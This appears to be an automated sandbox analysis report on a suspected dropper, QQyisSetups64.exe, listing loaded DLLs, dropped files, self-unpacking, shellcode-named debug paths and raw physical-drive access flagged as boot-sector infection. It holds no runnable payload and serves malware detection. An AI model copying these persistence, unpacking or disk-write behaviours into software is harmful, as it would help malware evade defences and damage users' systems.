Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Downloads\inst.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Downloads\inst.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\inst.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Downloads\inst.exe	Section loaded: wininet.dll
Source: C:\Users\user\Downloads\inst.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\inst.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\inst.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\inst.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Downloads\inst.exe

File written: C:\Users\user\AppData\Local\Temp\!@t97F6.tmp.dir\setup.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Downloads\inst.exe

Window detected: Number of UI elements: 24

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: QQyisSetups64.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: QQyisSetups64.exe

Static file information: File size 5289240 > 1048576

Source: QQyisSetups64.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2d9400
Source: QQyisSetups64.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1ef400

Source:	Binary string: \Release\Code_Shellcode.pdb source: QQyisSetups64.exe, QQyisSetups64.exe, 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr
Source:	Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr
Source:	Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr
Source:	Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr
Source:	Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: QQyisSetups64.exe, 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: inst.exe, inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Unpacked PE file: 3.2.QQyisSetups64.exe.400000.0.unpack

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Code function: 3_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,

3_2_10001170

Source: QQyisSetups64.exe	Static PE information: real checksum: 0x5142eb should be: 0x5110e9
Source: QQyisSetups64.exe.3.dr	Static PE information: real checksum: 0x5142eb should be: 0x5110e9

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03794345 push ecx; ret	6_2_03794358
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_037AA168 push eax; ret	6_2_037AA119
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_037AA0B8 push eax; ret	6_2_037AA119
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_037A2470 push ebp; retf	6_2_037A2474
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_037A2450 push ebp; retf	6_2_037A2474
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_037A2438 push ebp; retf	6_2_037A2474
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C9FE9A push ecx; ret	6_2_02C9FEBF
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02C89DF5 push ecx; ret	6_2_02C89E08
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0288CAFF push eax; retf	6_2_0288CB00
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0288CB0B push 701000CBh; retf	6_2_0288CB10
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0288CB07 pushad ; retf	6_2_0288CB08
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_0288CB61 pushfd ; retf	6_2_0288CB64
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_02889DCC push ecx; ret	6_2_02889DDF
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03613D04 push ecx; ret	6_2_03613D17
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AF4821 push ecx; ret	15_2_00AF4834
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AF54F9 push ecx; ret	15_2_00AF550C
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A87330 push ecx; mov dword ptr [esp], 00000000h	15_2_00A87331
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A739B0 push ecx; mov dword ptr [esp], 00000000h	15_2_00A739B1
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00A73C30 push ecx; mov dword ptr [esp], 00000000h	15_2_00A73C31
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C68E944 push ecx; ret	15_2_6C68E957
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C5D2500 push ecx; mov dword ptr [esp], 00000000h	15_2_6C5D2501
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AF4821 push ecx; ret	16_2_00AF4834
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A87330 push ecx; mov dword ptr [esp], 00000000h	16_2_00A87331
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AF54F9 push ecx; ret	16_2_00AF550C
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A739B0 push ecx; mov dword ptr [esp], 00000000h	16_2_00A739B1
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00A73C30 push ecx; mov dword ptr [esp], 00000000h	16_2_00A73C31

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d	15_2_00AE18BD
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d	15_2_00AE1A51
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d	15_2_00AE1BEB
Source: C:\Users\user\Downloads\inst.exe	Code function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d	15_2_00AE2158
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d	15_2_00AF2210
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d	15_2_00AF25D0
Source: C:\Users\user\Downloads\inst.exe	Code function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_00A766F0
Source: C:\Users\user\Downloads\inst.exe	Code function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_00AF2760
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_00A76759
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_00A868A0
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d	15_2_00A86AE0
Source: C:\Users\user\Downloads\inst.exe	Code function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_6C5D42E0
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	15_2_6C5D4349
Source: C:\Users\user\Downloads\inst.exe	Code function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d	16_2_00AE2158
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d	16_2_00AF2210
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d	16_2_00AF25D0
Source: C:\Users\user\Downloads\inst.exe	Code function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	16_2_00A766F0
Source: C:\Users\user\Downloads\inst.exe	Code function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	16_2_00AF2760
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	16_2_00A76759
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d	16_2_00A868A0
Source: C:\Users\user\Downloads\inst.exe	Code function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d	16_2_00A86AE0
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d	16_2_00AE18BD
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d	16_2_00AE1A51
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d	16_2_00AE1BEB

Source: C:\Users\user\Desktop\QQyisSetups64.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exe	Jump to dropped file
Source: C:\Users\user\Downloads\inst.exe	File created: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QQyisSetups64.exe	File created: C:\Users\user\Downloads\inst.exe	Jump to dropped file
Source: C:\Users\user\Downloads\inst.exe	File created: C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QQyisSetups64.exe	File created: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Jump to dropped file

Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ADDA24 GetPrivateProfileStringW,	15_2_00ADDA24
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AA9A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,	15_2_00AA9A0C
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00ADDA24 GetPrivateProfileStringW,	16_2_00ADDA24
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AA9A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64,	16_2_00AA9A0C

Source: C:\Users\user\Desktop\QQyisSetups64.exe	File created: C:\Users\user\Desktop\Logs\QQyisSetups64.log			Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File created: C:\Users\user\AppData\Roaming\Logs\QQyisSetups64.log			Jump to behavior

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d	15_2_00AE18BD
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d	15_2_00AE1A51
Source: C:\Users\user\Downloads\inst.exe	Code function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d	15_2_00AE1BEB
Source: C:\Users\user\Downloads\inst.exe	Code function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d	15_2_00AE2158
